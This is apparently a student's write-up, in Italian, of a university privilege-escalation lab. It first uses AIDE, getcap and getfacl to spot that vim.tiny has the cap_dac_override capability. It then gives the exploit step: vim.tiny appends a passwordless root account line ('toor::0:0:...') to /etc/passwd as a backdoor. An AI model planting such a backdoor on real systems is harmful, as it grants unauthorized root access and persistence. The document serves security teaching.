# Nome: Davide Chirichella
# Matricola: 0001071414
# Esercizio: privilege escalation 9 gennaio 2023

# DETECTION ==============================================================================

1. Imposto su /etc/aide/aide.conf la direttiva per indicare tutte le cartelle potenzialmente modificabili, in questo caso:

/usr/bin  f  Full

2. Lancio una scansione con "aide -C -c /etc/aide/aide.conf"

3. Noto, anche mediante i comandi "getcap" e "getfacl", che il binario fornito fa questo:

- /usr/bin/vim.tiny cap_dac_override=ep

# ATTACK =================================================================================

1. Utilizzo di vim.tiny per aggiungere su /etc/passwd una backdoor che può fare 
login senza password e avrà i permessi di root

toor::0:0:root:/root:/usr/bin/zsh




